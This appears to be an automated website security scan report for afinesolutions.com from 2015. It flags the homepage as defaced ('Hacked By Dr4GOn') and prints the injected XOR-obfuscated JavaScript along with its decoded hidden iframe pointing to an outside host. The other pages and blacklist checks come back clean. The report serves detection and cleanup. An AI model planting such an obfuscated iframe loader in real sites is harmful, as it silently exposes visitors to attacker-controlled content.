Scanned pages/files
Request | Server response | Status |
http://afinesolutions.com/ | 200 OK Content-Length: 11983 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var enkripsi="'02'02'02'02'1Akdpcog'02qpa'1F'00jvvr'1C--`cn{cl,kp-fgom-pf,jvon'00'02qapmnnkle'1F'00lm'00'02jgkejv'1F'00332'07'00'02ukfvj'1F'00322'07'00'02kf'1F'00dpo'00'1G'1A-kdpcog'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli); Decoded script: <iframe src="http://balyan.ir/demo/rd.html" scrolling="no" height="110%" width="100%" id="frm"></iframe> Deface/Content modification. The following signature was found: Hacked By Dr4GOn <!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <title>Hacked By Dr4GOn</title> <style> #frm{ border:none; overflow:no-content; position:absolute; top:0; left:0; z-index:-100; } .wrapper{ width:100%; height:100%; background:transparent; position:absolute; z-index:-99; top:0; ...[13399 bytes skipped]... | ||
http://afinesolutions.com/test404page.js | 404 Not Found Content-Length: 9610 Content-Type: text/html | clean |
http://afinesolutions.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://afinesolutions.com/wp-content/themes/zeestyle/includes/js/jquery.cycle.all.min.js?ver=3.5 | 200 OK Content-Length: 27450 Content-Type: application/javascript | clean |
http://afinesolutions.com/contact/ | 200 OK Content-Length: 9719 Content-Type: text/html | clean |
http://afinesolutions.com/wp-includes/js/comment-reply.min.js?ver=3.5 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://afinesolutions.com/my-favorite-things/ | 200 OK Content-Length: 9680 Content-Type: text/html | clean |
http://afinesolutions.com/2013/07/if-i-can-trust-them-you-can-too/ | 200 OK Content-Length: 10317 Content-Type: text/html | clean |
http://afinesolutions.com/author/jenny/ | 200 OK Content-Length: 27750 Content-Type: text/html | clean |
http://afinesolutions.com/category/post/ | 200 OK Content-Length: 27765 Content-Type: text/html | clean |
http://afinesolutions.com/2013/05/usability-testing-with-key-lime-interactive/ | 200 OK Content-Length: 10447 Content-Type: text/html | clean |
http://afinesolutions.com/2013/03/a-fine-kitchen-remodeling-company/ | 200 OK Content-Length: 10365 Content-Type: text/html | clean |
http://afinesolutions.com/2013/02/rollover-your-ira-or-401k/ | 200 OK Content-Length: 10479 Content-Type: text/html | clean |
http://afinesolutions.com/2013/01/great-networking-book/ | 200 OK Content-Length: 9980 Content-Type: text/html | clean |
http://afinesolutions.com/2013/01/great-networking-book/book/ | 200 OK Content-Length: 9126 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: afinesolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 19 Nov 2015 09:14:36 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://afinesolutions.com/xmlrpc.php
GET / HTTP/1.1
Host: afinesolutions.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 19 Nov 2015 09:14:36 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://afinesolutions.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: afinesolutions.com
Referer: http://www.google.com/search?q=afinesolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: afinesolutions.com
Referer: http://www.google.com/search?q=afinesolutions.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=afinesolutions.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://afinesolutions.com/
Result: afinesolutions.com is not infected or malware details are not published yet.
Result: afinesolutions.com is not infected or malware details are not published yet.